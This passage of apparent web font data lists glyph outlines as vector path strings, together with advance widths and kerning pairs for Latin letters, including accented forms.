-32,-155,-45,-258,-36v-10,121,0,221,0,344v0,52,1,118,4,199","w":1280,"k":{"\u00fc":51,"\u00f6":51,"\u00dc":39,"\u00d6":51,"y":39,"w":27,"v":51,"u":51,"o":51,"e":51,"Y":102,"W":51,"V":90,"U":39,"T":27,"Q":39,"O":51,"G":63,"C":39}},{"d":"134,-701v0,-53,47,-101,101,-101v57,0,106,47,106,103v0,54,-49,102,-103,102v-56,0,-104,-48,-104,-104xm235,-182v99,2,154,69,152,179v-2,128,-56,188,-136,251v-27,21,-72,45,-137,73r-27,-39v77,-45,130,-86,158,-120v28,-34,42,-70,42,-108v0,-27,-22,-55,-45,-55r-62,2v-37,-1,-65,-38,-65,-80v0,-61,68,-104,120,-103","w":448},{"d":"650,-148v-1,76,92,98,129,35v8,-14,11,-19,34,-23v14,31,5,35,-18,72v-33,53,-57,88,-135,88v-90,0,-129,-42,-139,-137v-94,61,-167,134,-322,134v-66,0,-110,-45,-110,-109v0,-46,29,-101,85,-165v56,-64,132,-116,229,-157v68,-29,110,-47,125,-55v1,-22,2,-46,2,-72v-1,-142,-24,-217,-137,-217v-99,0,-168,64,-185,182v-3,18,-12,36,-23,56v-29,19,-52,28,-69,28v-19,0,-50,-10,-50,-29v0,-17,22,-55,56,-117v70,-126,243,-222,415,-168v54,17,107,78,113,140v11,115,2,376,0,514xm262,-231v-54,73,-32,178,61,178v82,0,136,-56,196,-112v6,-132,10,-152,4,-252v-92,34,-205,110,-261,186xm515,-1277v38,-28,111,-14,107,35v-4,51,-30,62,-81,97r-235,161v-7,1,-15,1,-22,0v70,-94,143,-229,231,-293","w":832},{"d":"43,-32v15,-6,30,-10,45,-11v102,-7,160,-19,175,-37v44,-156,18,-607,18,-833v0,-91,7,-176,-5,-268v-1,-10,-6,-18,-11,-27v-23,-23,-188,-26,-213,-40v-5,-4,-8,-14,-9,-31r349,6v68,0,159,-2,272,-6v0,11,-1,21,-2,30v-54,17,-188,12,-202,49v-15,42,-17,136,-17,196r4,621v-1,55,-2,93,-2,113v3,110,-9,145,25,188v31,40,151,25,187,49v3,12,3,18,3,30v-61,2,-105,3,-134,3v-17,0,-46,-3,-89,-3r-392,1xm454,-1699v38,-28,111,-14,107,35v-4,51,-30,62,-81,97r-235,161v-7,1,-15,1,-22,0v70,-94,143,-229,231,-293","w":725},{"d":"98,-1078v0,-166,141,-308,307,-308v167,0,308,141,308,308v0,165,-142,307,-308,307v-165,0,-307,-142,-307,-307xm628,-1079v0,-121,-102,-223,-223,-223v-121,0,-223,102,-223,223v0,120,103,223,223,223v119,0,223,-104,223,-223","w":811},{"d":"583,-1116v60,-9,77,-47,88,-121r29,0v11,116,-61,201,-164,204v-113,3,-184,-120,-288,-120v-64,0,-77,44,-90,118r-28,0v-14,-122,92,-243,230,-190v42,16,180,116,223,109xm650,-148v-1,76,92,98,129,35v8,-14,11,-19,34,-23v14,31,5,35,-18,72v-33,53,-57,88,-135,88v-90,0,-129,-42,-139,-137v-94,61,-167,134,-322,134v-66,0,-110,-45,-110,-109v0,-46,29,-101,85,-165v56,-64,132,-116,229,-157v68,-29,110,-47,125,-55v1,-22,2,-46,2,-72v-1,-142,-24,-217,-137,-217v-99,0,-168,64,-185,182v-3,18,-12,36,-23,56v-29,19,-52,28,-69,28v-19,0,-50,-10,-50,-29v0,-17,22,-55,56,-117v70,-126,243,-222,415,-168v54,17,107,78,113,140v11,115,2,376,0,514xm262,-231v-54,73,-32,178,61,178v82,0,136,-56,196,-112v6,-132,10,-152,4,-252v-92,34,-205,110,-261,186","w":832},{"d":"374,-401v93,-137,201,-275,312,-397r62,-2v-5,10,-17,29,-34,58v-46,73,-109,185,-188,336v6,12,18,34,37,65v25,41,46,80,63,114v6,12,20,35,41,68v9,14,21,42,43,80v20,34,34,55,39,64r-53,4xm322,-799r58,1r-214,393v37,81,173,286,226,393r-50,1v-9,-9,-19,-20,-29,-35v-17,-26,-239,-277,-301,-357v38,-53,68,-94,89,-121r159,-202v30,-37,51,-61,62,-73","w":747},{"d":"108,482v-22,0,-50,-18,-48,-45v9,-106,135,-149,195,-204r70,-263v3,-18,12,-56,27,-113v-91,-8,-180,-12,-267,-12v-6,-15,-7,-22,-4,-35v82,-9,229,-2,283,-8r57,-243v15,-53,43,-155,91,-301v43,-131,77,-238,162,-352v60,-80,117,-137,175,-168v82,-45,354,-67,362,51v4,52,-44,92,-91,65v-43,-24,-106,-111,-181,-106v-70,5,-78,15,-119,60v-96,103,-155,343,-197,501r-101,384v-9,29,-17,62,-23,101v141,3,228,7,260,12v-2,17,-11,33,-18,51r-264,6v-55,140,-71,175,-169,358v84,-38,199,-66,274,-16v93,62,119,76,225,157v26,20,40,43,89,43v61,0,152,-96,147,-159v6,-32,-45,-110,-45,-133v0,-30,24,-65,59,-65v59,0,78,52,87,93v0,15,-1,46,-15,91v-33,107,-107,163,-185,206v-61,34,-158,53,-222,22v-115,-55,-216,-243,-380,-209v-11,2,-24,7,-36,15v-60,44,-61,136,-126,182v-31,22,-53,34,-72,34","w":1173},{"d":"328,-1006v91,-160,154,-269,191,-326r57,0r191,325r-4,26r-186,-183r-40,-36r-206,223v-4,-10,-3,-17,-3,-29xm971,-384v0,222,-220,420,-464,411v-246,-9,-434,-172,-434,-429v0,-176,112,-317,238,-376v61,-28,135,-42,222,-42v241,0,438,200,438,436xm227,-381v0,215,102,369,288,369v199,0,301,-169,301,-382v0,-187,-87,-395,-291,-387v-209,9,-298,157,-298,400"},{"d":"232,-1006v91,-160,154,-269,191,-326r57,0r191,325r-4,26r-186,-183r-40,-36r-206,223v-4,-10,-3,-17,-3,-29xm94,-494v19,-79,69,-186,131,-234v79,-62,134,-92,256,-94v139,-2,223,67,271,150v31,53,42,91,40,144r-477,3v-31,0,-62,1,-94,4v-15,42,-9,64,-9,110v0,101,72,239,148,285v65,40,184,61,270,35v45,-14,128,-73,168,-110v2,18,8,35,5,55v-55,72,-155,142,-254,163v-329,69,-531,-195,-455,-511xm652,-622v-6,-90,-75,-153,-178,-153v-120,0,-234,107,-240,211v103,1,134,-16,351,-16v49,0,62,-16,67,-42","w":853},{"d":"169,-8v-65,1,-117,7,-184,1v0,-10,0,-14,4,-25v22,-13,40,-6,72,-9v110,-9,118,-12,151,-80v163,-337,252,-684,404,-1070v14,-37,31,-87,51,-150v21,-2,42,-2,64,-1v59,116,83,196,135,338r317,868v28,47,19,57,75,69v44,10,85,23,109,34v5,15,5,17,1,32r-325,-5r-121,2v-30,-3,-66,2,-88,-9v0,-9,2,-18,5,-27v50,-19,140,-5,189,-25v15,-46,2,-47,-20,-120v-10,-34,-23,-65,-32,-95v-9,-30,-44,-129,-106,-296v-110,-16,-228,-6,-349,-6v-23,0,-48,2,-75,5v-42,105,-67,210,-105,318v-37,105,-56,162,-56,173v0,6,3,16,9,30v51,14,130,16,192,23v13,11,13,14,8,31v-30,1,-53,1,-69,1xm466,-632v71,4,153,6,244,6v52,0,98,-2,137,-5v-54,-174,-123,-331,-186,-496r-10,-18v-67,151,-144,358,-191,509xm527,-1622v-35,-38,-9,-91,37,-93v24,0,49,13,78,35v39,30,157,201,205,274r-17,1v-86,-61,-244,-153,-303,-217","w":1387},{"d":"134,-849v-116,-248,104,-480,374,-467v131,6,207,23,287,82v16,93,3,159,-1,238v-10,5,-15,5,-24,2v-36,-163,-122,-259,-295,-268v-185,-10,-338,184,-209,332v48,55,413,235,490,298v79,65,139,145,139,275v0,155,-94,286,-205,343v-154,80,-480,49,-597,-38v-21,-15,-18,-32,-14,-62v15,-99,9,-180,22,-249v16,-17,37,0,37,24v0,156,176,317,345,317v218,0,373,-230,230,-398v-38,-45,-114,-96,-229,-156v-115,-60,-189,-104,-224,-131v-56,-45,-102,-90,-126,-142","w":981,"k":{".":78,",":78}},{"d":"832,-791v20,-2,49,-4,49,17v0,14,-14,21,-29,21v-66,13,-95,20,-118,80r-235,623r-124,337v-33,74,-73,166,-125,192v-25,13,-47,26,-83,26v-97,0,-117,-115,-36,-139r13,-3v59,11,96,16,111,16v14,-7,24,-16,31,-26v46,-63,119,-206,119,-284v0,-23,-10,-55,-26,-99r-111,-294v-15,-38,-61,-162,-137,-372v-5,-13,-11,-23,-18,-30v-30,-10,-56,-21,-89,-29v-18,-4,-20,-19,-12,-33v50,-4,99,-6,150,-4r85,3v56,-2,120,-4,168,5v4,10,5,15,3,24v-32,17,-131,14,-154,36v-6,28,11,47,19,77v14,50,46,145,95,286v35,102,68,190,98,263v68,-157,148,-359,192,-545v15,-63,0,-86,-59,-99v-48,-10,-73,-19,-77,-22v-4,-3,-6,-10,-7,-20v30,-18,93,-7,143,-7r164,0","w":853,"k":{"\u00f6":27,"o":27,"d":27,".":168,",":168}},{"d":"346,-118v-124,-109,-174,-177,-219,-307v-45,-130,-48,-285,-3,-414v37,-106,127,-252,224,-315v112,-72,261,-138,478,-138v139,0,274,39,404,116r133,-159v12,9,26,20,41,35r-131,158v205,170,280,423,203,709v-39,146,-113,224,-246,324v-100,74,-259,130,-433,129v-160,0,-296,-35,-408,-105r-122,147r-42,-34xm419,-204r748,-897v-140,-142,-332,-191,-546,-124v-183,58,-269,206,-320,397v-66,244,7,474,118,624xm454,-162v114,130,301,176,511,120v249,-66,355,-289,355,-597v0,-157,-40,-325,-117,-420","w":1600},{"d":"519,-63v138,0,186,-44,280,-120r1,65v-94,97,-167,149,-333,149v-243,0,-389,-200,-389,-434v0,-162,100,-303,214,-363v109,-57,353,-66,455,-2v64,40,47,146,-34,146v-84,0,-137,-134,-244,-129v-155,8,-230,174,-230,334v0,191,114,354,280,354","w":853,"k":{"k":27,"h":27,".":51,",":51}},{"d":"54,0r-2,-29v14,-19,106,-4,120,-31v6,-12,11,-57,11,-137r2,-395v-3,-67,4,-135,2,-202r-4,-174r1,-152v-4,-99,-20,-76,-125,-99r1,-29v107,-25,105,-31,218,-92r31,0r-2,158r3,79r-2,678v31,4,53,-5,80,-24v105,-74,172,-125,197,-153v37,-41,55,-48,27,-86v-33,-19,-81,-24,-121,-34v-3,-11,-2,-17,3,-30v105,-4,197,-6,275,-6v44,0,91,1,141,3v0,14,1,19,-5,31v-47,9,-112,21,-141,37v-94,51,-194,148,-280,220v61,76,192,205,232,258r38,44v97,109,79,105,219,134v4,12,5,18,3,29v-136,-10,-283,-2,-420,4v-7,0,-14,-1,-21,-4v-7,-12,-1,-30,8,-32v87,-11,104,0,132,-24v0,-11,-10,-29,-29,-55v-12,-17,-197,-234,-240,-263v-20,-15,-61,-13,-98,-13v-4,38,-12,296,16,319v15,38,122,7,115,67","w":960,"k":{"\u00f6":27,"y":-25,"o":27,"e":27}},{"d":"94,-494v19,-79,69,-186,131,-234v79,-62,134,-92,256,-94v139,-2,223,67,271,150v31,53,42,91,40,144r-477,3v-31,0,-62,1,-94,4v-15,42,-9,64,-9,110v0,101,72,239,148,285v65,40,184,61,270,35v45,-14,128,-73,168,-110v2,18,8,35,5,55v-55,72,-155,142,-254,163v-329,69,-531,-195,-455,-511xm652,-622v-6,-90,-75,-153,-178,-153v-120,0,-234,107,-240,211v103,1,134,-16,351,-16v49,0,62,-16,67,-42xm648,-1056v-45,0,-86,-40,-86,-84v0,-50,38,-89,86,-89v47,0,86,39,86,86v0,47,-39,87,-86,87xm304,-1056v-45,0,-86,-40,-86,-84v0,-49,38,-89,85,-89v46,0,87,41,87,87v0,46,-40,86,-86,86","w":853},{"d":"197,-1061r61,-62r426,426r426,-426r61,62r-425,427r421,421r-62,62r-421,-422r-424,422r-62,-62r423,-421","w":1365},{"d":"145,-859r492,0r0,-494r88,0r0,494r495,0r0,88r-495,0r0,492r-88,0r0,-492r-492,0r0,-88xm145,-52r1075,0r0,89r-1075,0r0,-89","w":1365},{"d":"428,-930v-87,0,-163,-76,-163,-164v0,-88,76,-165,164,-165v88,0,164,76,164,164v0,89,-76,165,-165,165xm310,-1096v0,65,54,121,118,121v65,0,120,-55,120,-120v0,-64,-56,-119,-119,-119v-63,0,-119,55,-119,118xm650,-148v-1,76,92,98,129,35v8,-14,11,-19,34,-23v14,31,5,35,-18,72v-33,53,-57,88,-135,88v-90,0,-129,-42,-139,-137v-94,61,-167,134,-322,134v-66,0,-110,-45,-110,-109v0,-46,29,-101,85,-165v56,-64,132,-116,229,-157v68,-29,110,-47,125,-55v1,-22,2,-46,2,-72v-1,-142,-24,-217,-137,-217v-99,0,-168,64,-185,182v-3,18,-12,36,-23,56v-29,19,-52,28,-69,28v-19,0,-50,-10,-50,-29v0,-17,22,-55,56,-117v70,-126,243,-222,415,-168v54,17,107,78,113,140v11,115,2,376,0,514xm262,-231v-54,73,-32,178,61,178v82,0,136,-56,196,-112v6,-132,10,-152,4,-252v-92,34,-205,110,-261,186","w":832,"k":{"y":27,"w":27,"v":27}},{"d":"1031,-866v-10,59,-9,338,4,440v0,6,-1,14,-3,24v-8,4,-11,4,-20,4v-26,-43,-56,-195,-86,-214v-68,-44,-206,-22,-318,-22v-93,0,-153,2,-182,6r0,446v6,120,-9,139,87,140r258,2v329,1,359,-26,467,-256v17,-37,29,-52,58,-33v-37,123,-46,152,-46,273v0,22,-5,40,-16,55r-851,6r-308,9v-22,1,-28,-10,-25,-30v24,-30,179,-17,195,-37v21,-26,13,-82,13,-126r0,-625r-5,-285v-5,-141,6,-126,-120,-137v-39,-3,-97,2,-75,-43v6,-3,11,-5,16,-5r156,6v83,-4,167,4,250,2r306,-6v15,0,53,2,114,4v52,2,111,4,159,2r83,-3v34,7,8,76,8,101v0,69,7,128,7,176v0,12,-17,8,-26,5v-29,-60,-71,-181,-124,-228v-142,-24,-336,-3,-502,-5v-37,0,-59,5,-66,14v-11,16,-17,63,-17,141v0,4,7,285,5,379v143,12,307,11,460,1v86,-6,69,-23,85,-115v10,-61,12,-98,57,-81v1,5,2,10,2,15xm806,-1699v38,-28,111,-14,107,35v-4,51,-30,62,-81,97r-235,161v-7,1,-15,1,-22,0v70,-94,143,-229,231,-293","w":1344},{"d":"552,-819v115,0,165,28,241,75v17,-16,47,-50,90,-101v13,9,22,18,29,27r-83,100v94,105,203,269,120,468v-62,149,-215,278,-432,276v-128,-2,-172,-25,-262,-79r-87,101v-9,-6,-18,-14,-29,-24r84,-101v-87,-89,-145,-168,-145,-319v0,-212,126,-344,283,-400v48,-17,112,-23,191,-23xm737,-675v-57,-91,-201,-140,-330,-81v-126,58,-175,191,-175,393v0,82,17,152,50,209xm309,-113v59,86,198,126,325,74v58,-24,108,-69,145,-145v21,-45,42,-119,42,-224v0,-70,-23,-151,-44,-204v-3,-6,-10,-14,-21,-23"},{"d":"166,-696v0,-11,-5,-20,-16,-29r-117,-28r0,-32r108,2v50,-4,144,-1,154,0r-6,381v0,117,3,191,11,220v25,105,194,118,296,66v44,-22,83,-45,114,-74v10,-105,9,-227,9,-339v0,-108,-5,-169,-16,-183v-1,-19,-123,-32,-173,-39v-8,-14,-9,-19,-5,-31v90,-6,241,0,321,-2r2,73r-10,457r4,136v13,29,29,22,74,24v9,0,33,2,74,6r1,30v-117,24,-185,49,-273,74v-10,-58,-2,-90,-6,-151v-88,62,-180,154,-311,154v-172,0,-241,-132,-238,-344v-1,-23,6,-91,5,-103","w":1003},{"d":"991,-1487v60,-9,77,-47,88,-121r29,0v11,116,-61,201,-164,204v-113,3,-184,-120,-288,-120v-64,0,-77,44,-90,118r-28,0v-14,-122,92,-243,230,-190v42,16,180,116,223,109xm527,24v-136,-16,-333,-5,-484,-6r-1,-30v56,-30,164,-16,196,-60v24,-222,6,-576,6,-849v0,-127,-4,-202,-13,-224v-17,-42,-69,-59,-125,-66v-41,-5,-67,-9,-79,-12r-1,-48v103,0,179,-3,227,-8v34,-3,35,-4,66,-2v35,28,65,65,96,100r211,233r30,36v43,50,81,93,116,128v35,35,104,109,205,221r329,362v-7,-107,0,-210,-3,-317r-7,-296v-1,-19,-2,-57,-8,-110v-9,-81,-1,-230,-20,-269v-10,-21,-147,-34,-194,-38v-5,-2,-11,-8,-16,-17v1,-11,4,-21,9,-30v60,-21,133,6,197,6v43,0,180,-11,236,-10r-2,31v-36,11,-118,13,-139,36v-16,17,-24,35,-24,53r11,316r8,145r11,601v0,22,-1,70,-4,143r-47,4v-27,-35,-306,-311,-392,-420r-87,-92r-283,-310v-54,-50,-178,-221,-251,-272v-10,218,12,622,14,903v1,28,2,55,5,81v70,16,150,18,222,35v5,4,9,7,12,9r-1,38v-11,3,-19,5,-26,5","w":1579},{"d":"515,-1238v-67,3,-152,-14,-167,38v17,51,49,87,83,136v43,61,96,154,144,225r152,230r185,-263r166,-249v25,-39,44,-70,9,-101v-18,-16,-90,-26,-153,-34v-7,-13,-8,-18,-6,-33r240,4r193,-2r-3,35v-35,4,-80,5,-98,24v-202,206,-322,391,-475,619r388,3v13,0,25,1,38,4r0,40r-444,-6v-13,80,-10,141,-9,223v210,0,361,0,453,1r0,40v-105,3,-184,5,-236,5r-217,-2v1,143,8,223,21,238v9,10,80,22,212,35v0,17,0,25,-7,41r-256,-11r-171,9r-184,-1v-9,-17,-2,-35,13,-37r129,-20v106,-37,88,-17,91,-177r0,-78r-473,-2r0,-40v35,2,55,3,59,3r414,-4r1,-45v-2,-122,5,-104,-36,-175v-194,0,-340,1,-438,3r0,-40v40,-2,176,-4,409,-6r-116,-177r-223,-325v-39,-57,-73,-93,-101,-114v-12,-9,-72,-19,-119,-22r-3,-43r388,9v55,0,114,-6,165,2v7,8,7,15,7,28","w":1344},{"d":"94,-494v19,-79,69,-186,131,-234v79,-62,134,-92,256,-94v139,-2,223,67,271,150v31,53,42,91,40,144r-477,3v-31,0,-62,1,-94,4v-15,42,-9,64,-9,110v0,101,72,239,148,285v65,40,184,61,270,35v45,-14,128,-73,168,-110v2,18,8,35,5,55v-55,72,-155,142,-254,163v-329,69,-531,-195,-455,-511xm652,-622v-6,-90,-75,-153,-178,-153v-120,0,-234,107,-240,211v103,1,134,-16,351,-16v49,0,62,-16,67,-42xm560,-1277v38,-28,111,-14,107,35v-4,51,-30,62,-81,97r-235,161v-7,1,-15,1,-22,0v70,-94,143,-229,231,-293","w":853},{"d":"468,-1339r89,0r0,722r-89,0r0,-722xm468,-192r89,0r0,720r-89,0r0,-720","w":1024},{"d":"220,-629v-49,0,-99,-51,-99,-100v0,-36,50,-107,98,-107v53,0,108,63,107,103v-2,51,-47,104,-106,104xm234,492v-70,0,-103,-61,-94,-142r45,-425r23,-447v16,-2,20,-1,37,2r12,309v20,195,17,301,55,511r4,105v-2,45,-38,87,-82,87","w":448},{"d":"94,-494v19,-79,69,-186,131,-234v79,-62,134,-92,256,-94v139,-2,223,67,271,150v31,53,42,91,40,144r-477,3v-31,0,-62,1,-94,4v-15,42,-9,64,-9,110v0,101,72,239,148,285v65,40,184,61,270,35v45,-14,128,-73,168,-110v2,18,8,35,5,55v-55,72,-155,142,-254,163v-329,69,-531,-195,-455,-511xm652,-622v-6,-90,-75,-153,-178,-153v-120,0,-234,107,-240,211v103,1,134,-16,351,-16v49,0,62,-16,67,-42xm300,-1200v-35,-38,-9,-91,37,-93v24,0,49,13,78,35v39,30,157,201,205,274r-17,1v-86,-61,-244,-153,-303,-217","w":853},{"d":"166,-696v0,-11,-5,-20,-16,-29r-117,-28r0,-32r108,2v50,-4,144,-1,154,0r-6,381v0,117,3,191,11,220v25,105,194,118,296,66v44,-22,83,-45,114,-74v10,-105,9,-227,9,-339v0,-108,-5,-169,-16,-183v-1,-19,-123,-32,-173,-39v-8,-14,-9,-19,-5,-31v90,-6,241,0,321,-2r2,73r-10,457r4,136v13,29,29,22,74,24v9,0,33,2,74,6r1,30v-117,24,-185,49,-273,74v-10,-58,-2,-90,-6,-151v-88,62,-180,154,-311,154v-172,0,-241,-132,-238,-344v-1,-23,6,-91,5,-103xm315,-1200v-35,-38,-9,-91,37,-93v24,0,49,13,78,35v39,30,157,201,205,274r-17,1v-86,-61,-244,-153,-303,-217","w":1003},{"d":"85,-162v-3,-30,29,-57,59,-56v30,0,66,28,109,84v31,41,59,66,82,75v12,-76,17,-419,8,-567v-116,-58,-262,-140,-257,-319v5,-159,109,-263,247,-298v0,-29,1,-32,6,-99r37,1v3,42,5,74,5,95v59,-8,100,-2,154,3r3,-97r43,0v4,23,2,77,4,103v118,33,171,49,231,135v28,41,-1,102,-53,102v-55,0,-126,-134,-145,-144v-9,-8,-22,-13,-40,-18v-16,198,5,310,-3,502v59,43,136,76,176,135v52,76,77,109,78,218v1,148,-103,263,-221,299v-14,4,-27,9,-39,15v-25,99,5,154,-13,266r-39,0v-6,-93,7,-166,-2,-257v-18,3,-62,6,-131,7v-10,52,-12,194,-15,249r-37,0v2,-53,3,-136,3,-249v-124,-21,-239,-75,-250,-185xm378,-759v18,11,95,49,151,76v-2,-169,18,-349,-1,-508v-54,-9,-107,-15,-153,1r2,143r-2,134xm332,-1181v-136,29,-212,188,-117,307v31,39,68,72,117,94v6,-75,5,-186,5,-242v0,-79,-2,-132,-5,-159xm377,-45v42,16,100,24,147,10r6,-245r-1,-201v0,-9,-1,-26,-3,-49v-47,-31,-92,-53,-134,-68v-3,9,-5,16,-5,20xm569,-52v108,-36,180,-157,134,-289v-29,-83,-67,-113,-125,-149v-11,128,-3,272,-13,406","w":917},{"d":"200,-141v103,-4,191,96,188,205v-5,158,-153,281,-304,292r1,-31v107,-48,200,-101,200,-210v0,-50,-37,-69,-89,-81v-55,-13,-60,-7,-88,-36v-7,-14,-10,-27,-10,-40v-6,-72,55,-97,102,-99","w":448},{"d":"756,-504v3,-155,-57,-227,-191,-227v-112,0,-188,53,-255,118v-1,32,-2,59,-2,82r3,221v3,138,-5,187,12,234v36,26,132,21,156,58r-1,20r-321,-3r-120,2v-2,-12,-3,-18,1,-33v31,-10,124,-18,134,-33v19,-26,15,-91,15,-142r-2,-307v1,-101,-32,-99,-116,-119r0,-36v113,-30,157,-83,208,-174r34,1r4,151v111,-87,320,-210,474,-97v103,76,96,133,94,340r-3,269v4,76,-7,90,32,115v64,9,101,19,112,31v0,14,-1,19,-6,33r-414,0v-3,-14,-11,-24,1,-37v45,-24,161,1,155,-78v-5,-62,-6,-269,-4,-389","k":{"\u00fc":27,"v":27,"u":27}},{"d":"229,-1139v-50,0,-87,-39,-87,-90v0,-44,42,-81,87,-81v45,0,93,43,93,85v0,42,-48,86,-93,86xm79,-2v-30,0,-73,17,-79,-10v0,-9,6,-17,19,-22v3,-1,36,-10,102,-23v49,-10,57,-32,59,-87v2,-51,2,-192,2,-422v0,-78,7,-86,-32,-114v-14,-10,-45,-20,-92,-31r1,-29v92,-26,85,-25,145,-71v27,-21,49,-47,67,-74v13,-2,19,-2,31,-1v8,141,5,302,3,456r-3,305v2,70,20,61,89,84v26,9,47,14,60,19v5,11,4,16,-2,27v-159,-6,-176,-7,-370,-7","w":469,"k":{"v":27}},{"d":"724,-1116v60,-9,77,-47,88,-121r29,0v11,116,-61,201,-164,204v-113,3,-184,-120,-288,-120v-64,0,-77,44,-90,118r-28,0v-14,-122,93,-243,231,-190v42,16,179,116,222,109xm756,-504v3,-155,-57,-227,-191,-227v-112,0,-188,53,-255,118v-1,32,-2,59,-2,82r3,221v3,138,-5,187,12,234v36,26,132,21,156,58r-1,20r-321,-3r-120,2v-2,-12,-3,-18,1,-33v31,-10,124,-18,134,-33v19,-26,15,-91,15,-142r-2,-307v1,-101,-32,-99,-116,-119r0,-36v113,-30,157,-83,208,-174r34,1r4,151v111,-87,320,-210,474,-97v103,76,96,133,94,340r-3,269v4,76,-7,90,32,115v64,9,101,19,112,31v0,14,-1,19,-6,33r-414,0v-3,-14,-11,-24,1,-37v45,-24,161,1,155,-78v-5,-62,-6,-269,-4,-389"},{"d":"752,-1186v-77,-1,-158,-60,-215,-60v-75,0,-142,59,-158,121v-9,36,-13,250,-11,346v166,4,254,6,265,6v3,34,3,37,-1,72v-72,9,-221,1,-261,13v-5,81,2,158,4,240v3,117,-20,264,17,352v28,40,52,42,133,53v37,5,61,9,74,11v0,14,-1,25,-3,32v-166,-10,-330,-3,-498,1r-1,-31v71,-21,137,-13,147,-70v1,-8,2,-45,2,-112v0,-190,-2,-342,-5,-455v-35,-11,-87,-8,-143,-14v-3,-13,-2,-24,8,-31v-3,-7,117,-45,128,-77v13,-40,24,-205,33,-228v61,-167,161,-322,389,-322v90,0,162,14,169,85v3,37,-34,69,-73,68","w":661,"k":{"l":-39,"k":-39,"?":-217,".":39,",":27,"!":-166," ":-268}},{"d":"457,-32v13,9,10,35,-13,34r-236,-7r-168,7v-24,5,-40,-20,-24,-34v2,-6,149,-26,148,-34v6,-5,10,-17,12,-34v6,-67,2,-323,3,-433r3,-238r-1,-238v-2,-54,13,-130,-8,-167v-14,-24,-105,-52,-121,-63r0,-22r210,-68r47,0v1,32,1,50,1,55v0,547,-1,874,-5,979v-4,105,-2,184,6,224v5,23,132,29,146,39","w":469},{"d":"513,-1374r448,538r-65,53r-383,-461r-384,461r-63,-53","w":1024},{"d":"20,-1006v91,-160,154,-269,191,-326r57,0r191,325r-4,26r-186,-183r-40,-36r-206,223v-4,-10,-3,-17,-3,-29xm33,1v-25,4,-46,-8,-31,-29v40,-21,142,-26,154,-46v31,-53,23,-92,23,-226r1,-303v-5,-86,-36,-85,-124,-110r-1,-29v92,-21,163,-69,214,-144v15,-5,17,-5,32,0r3,467r-3,300v1,25,4,41,11,47v4,12,90,34,138,51r0,26v-127,-7,-302,-21,-417,-4","w":469},{"d":"183,-787r110,-3v49,1,109,-2,149,6v11,2,14,20,5,32v-53,11,-121,15,-161,29v-19,17,7,38,12,65r100,240v45,110,86,203,124,278v73,-142,97,-211,169,-402v14,-36,31,-89,37,-143v-4,-26,-27,-42,-59,-50v-5,-1,-35,-6,-91,-15v-10,-4,-16,-14,-12,-32v75,-8,128,-5,210,-5v106,0,170,1,191,3v10,3,14,20,5,32v-43,13,-143,18,-156,34v-24,29,-63,149,-91,217r-76,185r-155,358r-30,0r-98,-211r-179,-419v-36,-81,-58,-125,-65,-132v-7,-7,-50,-21,-128,-42v-5,-16,-7,-19,-5,-32v74,1,139,9,194,7","w":960,"k":{"\u00f6":39,"\u00e5":39,"\u00e4":39,"q":39,"o":39,"e":39,"d":39,"c":39,"a":39,".":231,",":231}},{"d":"531,-1435v91,-160,154,-269,191,-326r57,0r191,325r-4,26r-186,-183r-40,-36r-206,223v-4,-10,-3,-17,-3,-29xm40,-1242v-17,-56,69,-39,123,-39r421,-3v5,21,7,24,2,44v-66,19,-162,-19,-187,51v-20,188,-7,406,-7,609v0,181,9,293,18,338v30,142,173,205,334,209v208,5,325,-58,390,-185v51,-100,50,-323,41,-488r-15,-287v-7,-221,-12,-214,-192,-260v-3,-9,-5,-19,-6,-29v65,-10,182,5,233,4r189,-4r-1,36v-82,11,-131,24,-147,38v-38,52,-24,100,-20,214r7,207r2,186v0,223,-2,304,-57,424v-60,131,-230,206,-419,211v-199,4,-294,-37,-389,-111v-103,-80,-127,-148,-129,-328r-3,-349r3,-378v-2,-56,-4,-97,-48,-97v-45,0,-127,3,-143,-13","w":1451},{"d":"650,-148v-1,76,92,98,129,35v8,-14,11,-19,34,-23v14,31,5,35,-18,72v-33,53,-57,88,-135,88v-90,0,-129,-42,-139,-137v-94,61,-167,134,-322,134v-66,0,-110,-45,-110,-109v0,-46,29,-101,85,-165v56,-64,132,-116,229,-157v68,-29,110,-47,125,-55v1,-22,2,-46,2,-72v-1,-142,-24,-217,-137,-217v-99,0,-168,64,-185,182v-3,18,-12,36,-23,56v-29,19,-52,28,-69,28v-19,0,-50,-10,-50,-29v0,-17,22,-55,56,-117v70,-126,243,-222,415,-168v54,17,107,78,113,140v11,115,2,376,0,514xm262,-231v-54,73,-32,178,61,178v82,0,136,-56,196,-112v6,-132,10,-152,4,-252v-92,34,-205,110,-261,186xm603,-1056v-45,0,-86,-40,-86,-84v0,-50,38,-89,86,-89v47,0,86,39,86,86v0,47,-39,87,-86,87xm259,-1056v-45,0,-86,-40,-86,-84v0,-49,38,-89,85,-89v46,0,87,41,87,87v0,46,-40,86,-86,86","w":832,"k":{"y":27,"w":27,"v":27}},{"d":"132,-410v-42,-118,-52,-287,-14,-410v37,-118,126,-259,223,-328v108,-77,271,-151,485,-144v263,9,424,96,552,260v75,96,124,227,124,380v0,186,-30,279,-111,391v-62,86,-207,201,-350,245v-216,66,-519,24,-655,-70v-96,-66,-209,-197,-254,-324xm1320,-639v0,-353,-172,-616,-521,-616v-209,0,-347,89,-425,239v-78,148,-126,354,-73,558v51,197,149,340,318,410v167,70,393,14,504,-70v136,-103,197,-293,197,-521","w":1600,"k":{"\u00c5":115,"\u00c4":115,"Y":78,"X":90,"W":90,"V":117,"A":115,".":154,",":180}},{"d":"402,-1148v-1,-55,-47,-90,-108,-90v-55,0,-105,34,-151,102r-37,-17v43,-96,104,-146,222,-151v85,-4,170,49,170,114v0,79,-51,102,-118,153v108,11,182,73,182,180v0,143,-144,247,-309,247v-71,0,-121,-12,-154,-28v-46,-22,-25,-72,22,-70v15,0,32,6,51,18v45,29,81,44,110,44v93,2,174,-86,174,-182v0,-76,-44,-148,-123,-147v-27,0,-58,14,-94,42r-24,-34v23,-17,43,-32,62,-43v83,-53,125,-99,125,-138","w":640},{"d":"832,-791v20,-2,49,-4,49,17v0,14,-14,21,-29,21v-66,13,-95,20,-118,80r-235,623r-124,337v-33,74,-73,166,-125,192v-25,13,-47,26,-83,26v-97,0,-117,-115,-36,-139r13,-3v59,11,96,16,111,16v14,-7,24,-16,31,-26v46,-63,119,-206,119,-284v0,-23,-10,-55,-26,-99r-111,-294v-15,-38,-61,-162,-137,-372v-5,-13,-11,-23,-18,-30v-30,-10,-56,-21,-89,-29v-18,-4,-20,-19,-12,-33v50,-4,99,-6,150,-4r85,3v56,-2,120,-4,168,5v4,10